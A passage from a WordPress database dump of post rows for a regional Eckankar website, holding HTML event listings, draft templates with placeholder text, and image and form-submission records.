href=\"https://www.ECKbooks.org\" target=\"_blank\" rel=\"noopener\">ECK Books</a> - It is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path to Spiritual Freedom as a community service for people of all faiths and beliefs.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/284807111/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Relationships Discussion\'','','publish','closed','closed','','online-meetup-relationships-discussion','','','2022-03-24 21:23:09','2022-03-25 03:23:09','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266407',0,'mec-events','',0),(266408,2,'2022-03-23 21:25:44','2022-03-24 03:25:44','','relationships-1','','inherit','closed','closed','','relationships-1','','','2022-03-23 21:25:44','2022-03-24 03:25:44','',266407,'https://eckankar-colorado.org/wp-content/uploads/2022/03/relationships-1.jpg',0,'attachment','image/jpeg',0),(266410,2,'2022-03-24 09:40:16','2022-03-24 15:40:16','','sunset-horizon-2','','inherit','closed','closed','','sunset-horizon-2','','','2022-03-24 09:40:16','2022-03-24 15:40:16','',266405,'https://eckankar-colorado.org/wp-content/uploads/2022/03/sunset-horizon-2.jpg',0,'attachment','image/jpeg',0),(266411,2,'2022-03-24 21:17:11','2022-03-25 03:17:11','<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">Find the answers to common questions of the heart, including the truth about soul mates, how to strengthen a marriage, and how to know if a partnership is worth developing.</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 15pt;\">You will discover:</span></strong><br />\r\n<span style=\"font-size: 14pt;\"></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">• The source of love</span><br />\r\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br />\r\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br />\r\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br />\r\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this open discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the first of 3 discussions that dig deeper into the topic each time.</span><br />\r\n<span style=\"font-size: 14pt;\">Join us for one or all of these lively discussions about the spiritual side of relationships.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\'<em>Spiritual Wisdom on Relationships</em>\' is a booklet which is available at <a class=\"link\" href=\"https://www.ECKbooks.org\" target=\"_blank\" rel=\"noopener\">ECK Books</a> - It is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path to Spiritual Freedom as a community service for people of all faiths and beliefs.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284828412/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Relationships Discussion\'','','publish','closed','closed','','online-meetup-relationships-discussion-2','','','2022-03-24 21:22:11','2022-03-25 03:22:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266411',0,'mec-events','',0),(266412,2,'2022-03-24 21:16:28','2022-03-25 03:16:28','','group-smiling-1','','inherit','closed','closed','','group-smiling-1','','','2022-03-24 21:16:28','2022-03-25 03:16:28','',266411,'https://eckankar-colorado.org/wp-content/uploads/2022/03/group-smiling-1.jpg',0,'attachment','image/jpeg',0),(266414,2,'2022-03-24 21:24:38','2022-03-25 03:24:38','<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">Find the answers to common questions of the heart, including the truth about soul mates, how to strengthen a marriage, and how to know if a partnership is worth developing.</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 15pt;\">You will discover:</span></strong><br />\r\n<span style=\"font-size: 14pt;\"></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">• The source of love</span><br />\r\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br />\r\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br />\r\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br />\r\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this open discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the first of 3 discussions that dig deeper into the topic each time.</span><br />\r\n<span style=\"font-size: 14pt;\">Join us for one or all of these lively discussions about the spiritual side of relationships.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\'<em>Spiritual Wisdom on Relationships</em>\' is a booklet which is available at <a class=\"link\" href=\"https://www.ECKbooks.org\" target=\"_blank\" rel=\"noopener\">ECK Books</a> - It is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path to Spiritual Freedom as a community service for people of all faiths and beliefs.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284828419/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Relationships Discussion\'','','publish','closed','closed','','online-meetup-relationships-discussion-3','','','2022-03-24 21:24:58','2022-03-25 03:24:58','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266414',0,'mec-events','',0),(266416,2,'2022-03-24 21:34:37','2022-03-25 03:34:37','<div class=\"break-words\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">What brings you joy and happiness in your life right now?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">How does gratitude play a role in your positive experiences in life?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">When you are feeling down, what lifts your spirits?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">What do you think of the phrase: “Do what you love, love what you do?”</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly welcomed to this spiritual discussion. We will be exploring techniques to discover ways to answer these questions and more. Our goal is that each participant will learn new ways to cultivate their own joy and happiness through spiritual awareness.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"The world has plenty of dark places, but the love and happiness you carry inside you lifts up all who need a smile\" — <a href=\"https://www.eckankar.org\">Eckankar.org</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/284828509/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - 12 Gifts of Spiritual Living:<br>\'Joy and Happiness\'','','publish','closed','closed','','online-meetup-12-gifts-of-spiritual-livingjoy-and-happiness','','','2022-03-24 21:43:13','2022-03-25 03:43:13','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266416',0,'mec-events','',0),(266417,2,'2022-03-24 21:33:28','2022-03-25 03:33:28','','happy-jump-2','','inherit','closed','closed','','happy-jump-2','','','2022-03-24 21:33:28','2022-03-25 03:33:28','',266416,'https://eckankar-colorado.org/wp-content/uploads/2022/03/happy-jump-2.jpg',0,'attachment','image/jpeg',0),(266419,0,'2022-03-25 09:41:33','2022-03-25 15:41:33','','','','publish','closed','closed','','266419','','','2022-03-25 09:41:33','2022-03-25 15:41:33','',0,'https://eckankar-colorado.org/nf_sub/266419/',0,'nf_sub','',0),(266432,2,'2022-03-26 11:09:40','2022-03-26 17:09:40','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p><span><strong>At vero eos et accusamus et iusto odio dignissimos ducimus</strong></span></p>\r\n<p class=\"\"><span>Qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus. Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.</span></p>\r\n<p class=\"\"><span>Risus feugiat in ante metus dictum at tempor commodo ullamcorper. Etiam tempor orci eu lobortis elementum nibh tellus molestie. Ultrices vitae auctor eu augue ut lectus. Nulla facilisi nullam vehicula ipsum a arcu cursus vitae. Vitae congue eu consequat ac. Felis imperdiet proin fermentum leo. Pretium vulputate sapien nec sagittis. Suspendisse potenti nullam ac tortor. Ipsum dolor sit amet consectetur adipiscing elit duis tristique. Id diam vel quam elementu</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','MEC BOOKING TEST ONLY ------','','draft','closed','closed','','mec-booking-test-only','','','2022-04-03 12:10:57','2022-04-03 18:10:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266432',0,'mec-events','',0),(266442,2,'2022-03-25 17:09:13','2022-03-25 23:09:13','','mountain-white-wildflowers-4','','inherit','closed','closed','','mountain-white-wildflowers-4','','','2022-03-25 17:09:13','2022-03-25 23:09:13','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/03/mountain-white-wildflowers-4.jpg',0,'attachment','image/jpeg',0),(266445,2,'2022-03-25 17:13:21','2022-03-25 23:13:21','','mountain-white-wildflowers-4b','','inherit','closed','closed','','mountain-white-wildflowers-4b-2','','','2022-03-25 17:13:21','2022-03-25 23:13:21','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/03/mountain-white-wildflowers-4b-1.jpg',0,'attachment','image/jpeg',0),(266467,2,'2022-03-29 12:31:30','2022-03-29 18:31:30','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This Event Is Available To Members Of Eckankar —</span></strong></p>\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #f28a27; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“The Temple of ECK is a center from which the message of the Light and Sound of God will reach many seekers. Behind the stone, mortar, wood, and glass of the ECK Temple is one purpose: to give the ECK teachings to all who want them.”</span><br>\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> Sri Harold Klemp, The Temple of ECK</em>, p. 3</span></p>\r\n</blockquote>\r\n<div>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are excited to announce a spring beautify day at the ECK Temple of Colorado! This spring we would like to give the chelas of Colorado an opportunity to refresh, renew, and rededicate themselves to our goals of Self-Realization and God-Realization by revitalizing the sacred ground around the ECK Temple of Colorado.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">It will be a joyous occasion where chelas can express their love of the ECK by gardening, washing windows, and beautifying the Temple grounds. We will also enjoy fellowship and a good meal together. For those not able to participate in physical activities we will have active spiritual exercises where we can practice the Master’s presence.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">After many long months away from the Temple, I am hoping everyone will make the time to include this beautiful occasion on their calendar of spring events. Open-hearted celebration of ECK traditions such as this one creates beacons of Light and Sound all over the globe and affects the consciousness of the world. Please join us as we celebrate in the name of the SUGMAD, the ECK, and the Mahanta.</span></p>\r\n<p class=\"\"><span style=\"color: #f28a27;\"><strong><span style=\"font-size: 14pt;\">Beautify Day Schedule</span></strong></span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">10:00 a.m. </span><em style=\"font-size: 14pt;\">Chela Meeting<br>\r\n</em><span style=\"font-size: 14pt;\">11:00 a.m. </span><em style=\"font-size: 14pt;\">Beautification Activities<br>\r\n</em><span style=\"font-size: 14pt;\">12:30 p.m. </span><em style=\"font-size: 14pt;\">Potluck and Barbecue</em></strong></p>\r\n</div>\r\n<div>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><span style=\"color: #f28a27;\"><strong>Note:</strong> </span>For the Potluck, the main dish will be provided. Please bring a side dish to share based on the list below as it relates to your last name:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>A-G:</strong> Salad, Fruit, Vegetables</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>H-O:</strong> Hot Side Dishes</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>P-S:</strong> Chips, Dips, Beverages</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>T-Z:</strong> Desserts</span></li>\r\n</ul>\r\n<p class=\"\"><strong><span id=\"nf-drawer-content\" style=\"font-size: 16pt; color: #333333;\">Please RSVP using the form below<br>\r\n[ninja_form id=56] <br>\r\n</span></strong></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">COVID-19 Safety Measures</span></strong><br>\r\n<span style=\"font-size: 13pt;\">** We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Beautify Day - A New ECK Tradition   --- TEMPLATE','','draft','closed','closed','','beautify-day-a-new-eck-tradition','','','2023-06-23 09:10:15','2023-06-23 15:10:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266467',0,'mec-events','',0),(266468,0,'2022-03-29 23:39:21','2022-03-30 05:39:21','','','','publish','closed','closed','','266468','','','2022-03-29 23:39:21','2022-03-30 05:39:21','',0,'https://eckankar-colorado.org/nf_sub/266468/',0,'nf_sub','',0),(266470,2,'2022-03-31 11:10:15','2022-03-31 17:10:15','','co-ecktemple-1','','inherit','closed','closed','','co-ecktemple-1','','','2022-03-31 11:10:15','2022-03-31 17:10:15','',266467,'https://eckankar-colorado.org/wp-content/uploads/2022/03/co-ecktemple-1.jpg',0,'attachment','image/jpeg',0),(266472,2,'2022-03-31 14:44:19','2022-03-31 20:44:19','','misty-path-1','','inherit','closed','closed','','misty-path-1','','','2022-03-31 14:44:19','2022-03-31 20:44:19','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/03/misty-path-1.jpg',0,'attachment','image/jpeg',0),(266474,2,'2022-03-31 15:35:00','2022-03-31 21:35:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the March 2022 edition of \'<em>The Mystic&nbsp;</em> <em>World</em>.\'</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Please have your copy of this issue on hand at the meeting.&nbsp; <br>\r\n<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">***You can find the Zoom login information in the April, 2022 edition of the<em> Colorado Eckankar Member Newsletter</em>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Online \'Mystic World\' Discussion','','publish','closed','closed','','online-mystic-world-discussion-test','','','2022-04-07 21:07:01','2022-04-08 03:07:01','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266474',0,'mec-events','',0),(266522,2,'2023-03-27 15:13:28','2023-03-27 21:13:28','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Members Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion - Online','','publish','closed','closed','','mystic-world-discussion-online','','','2023-03-27 16:30:56','2023-03-27 22:30:56','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266522',0,'mec-events','',0),(266531,0,'2022-04-05 08:55:49','2022-04-05 14:55:49','','','','publish','closed','closed','','266531','','','2022-04-05 08:55:49','2022-04-05 14:55:49','',0,'https://eckankar-colorado.org/nf_sub/266531/',0,'nf_sub','',0),(266532,2,'2022-04-05 15:52:26','2022-04-05 21:52:26','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 81px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[ninja_form id=56]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Temple \'Beautify Day\' - TEMPLATE','','draft','closed','closed','','','','','2022-08-05 09:47:20','2022-08-05 15:47:20','',0,'https://eckankar-colorado.org/?page_id=266532',0,'page','',0),(266534,2,'2022-04-05 15:52:26','2022-04-05 21:52:26',' ','','','publish','closed','closed','','266534','','','2022-04-05 15:52:26','2022-04-05 21:52:26','',0,'https://eckankar-colorado.org/266534/',28,'nav_menu_item','',0),(266537,2,'2022-04-05 15:57:17','2022-04-05 21:57:17','','','','publish','closed','closed','','266537','','','2022-04-05 15:57:17','2022-04-05 21:57:17','',0,'https://eckankar-colorado.org/nf_sub/266537/',0,'nf_sub','',0),(266538,2,'2022-04-05 16:54:26','2022-04-05 22:54:26','','','','publish','closed','closed','','266538','','','2022-04-05 16:54:26','2022-04-05 22:54:26','',0,'https://eckankar-colorado.org/nf_sub/266538/',0,'nf_sub','',0),(266539,2,'2022-04-05 16:59:46','2022-04-05 22:59:46','','','','publish','closed','closed','','266539','','','2022-04-05 16:59:46','2022-04-05 22:59:46','',0,'https://eckankar-colorado.org/nf_sub/266539/',0,'nf_sub','',0),(266540,2,'2022-06-07 09:38:13','2022-06-07 15:38:13','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">Tagline Goes Here</span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK LIGHT & SOUND TEMPLATE-In Person & Online-CONTAINS REGISTRATION | Benefit Title goes here','','draft','closed','closed','','eck-light-and-sound-service-in-person-onlinetitle-goes-here-template','','','2023-10-03 21:34:23','2023-10-04 03:34:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266540',0,'mec-events','',0),(266543,2,'2023-08-27 11:39:33','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">ADD DESCRIPTIVE TEXT HERE </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-2234-0.html\">ECK Bookstore</a>.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">For Login Information, Please Register Below.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','BOOK DISCUSSION ONLINE now called a Spiritual Discussion - Contains Registration-Update Notification Message with login info-TEMPLATE | Title Goes Here','','draft','closed','closed','','','','','2023-08-27 11:39:33','2023-08-27 17:39:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266543',0,'mec-events','',0),(266544,2,'2022-06-07 09:58:36','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the March 2022 edition of \'<em>The Mystic&nbsp;</em> <em>World</em>.\'</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Please have your copy of this issue on hand at the meeting.&nbsp;&nbsp;</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','MEC REGISTRATION - TICKET EXAMPLE TEMPLATE- (keep as backup registration template)','','draft','closed','closed','','','','','2022-06-07 09:58:36','2022-06-07 15:58:36','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266544',0,'mec-events','',0),(266545,2,'2023-08-27 11:30:44','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Tagline Goes Here<br>\r\n</span></strong></span><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','SOUND OF SOUL ONLINE TEMPLATE-CONTAINS REGISTRATION | Benefit Title Goes Here','','draft','closed','closed','','','','','2023-08-27 11:30:44','2023-08-27 17:30:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266545',0,'mec-events','',0),(266548,0,'2022-04-08 17:04:00','2022-04-08 23:04:00','','','','publish','closed','closed','','266548','','','2022-04-08 17:04:00','2022-04-08 23:04:00','',0,'https://eckankar-colorado.org/nf_sub/266548/',0,'nf_sub','',0),(266551,2,'2022-04-09 10:16:27','2022-04-09 16:16:27','','email-img-registration-603-lg-blu-jpg','','inherit','closed','closed','','email-img-registration-603-lg-blu-jpg','','','2022-04-09 10:16:27','2022-04-09 16:16:27','',266544,'https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-603-lg-blu-jpg.png',0,'attachment','image/png',0),(266552,0,'2022-04-09 10:25:41','2022-04-09 16:25:41','','','','publish','closed','closed','','266552','','','2022-04-09 10:25:41','2022-04-09 16:25:41','',0,'https://eckankar-colorado.org/nf_sub/266552/',0,'nf_sub','',0),(266554,0,'2022-04-10 10:20:51','2022-04-10 16:20:51','','','','publish','closed','closed','','266554','','','2022-04-10 10:20:51','2022-04-10 16:20:51','',0,'https://eckankar-colorado.org/nf_sub/266554/',0,'nf_sub','',0),(266555,2,'2022-04-10 15:17:50','2022-04-10 21:17:50','','email-img-registration-600-5','','inherit','closed','closed','','email-img-registration-600-5','','','2022-04-10 15:17:50','2022-04-10 21:17:50','',266544,'https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg',0,'attachment','image/jpeg',0),(266559,0,'2022-04-13 10:10:22','2022-04-13 16:10:22','','','','publish','closed','closed','','266559','','','2022-04-13 10:10:22','2022-04-13 16:10:22','',0,'https://eckankar-colorado.org/nf_sub/266559/',0,'nf_sub','',0),(266560,0,'2022-04-13 17:21:23','2022-04-13 23:21:23','','','','publish','closed','closed','','266560','','','2022-04-13 17:21:23','2022-04-13 23:21:23','',0,'https://eckankar-colorado.org/nf_sub/266560/',0,'nf_sub','',0),(266561,0,'2022-04-13 17:31:49','2022-04-13 23:31:49','','','','publish','closed','closed','','266561','','','2022-04-13 17:31:49','2022-04-13 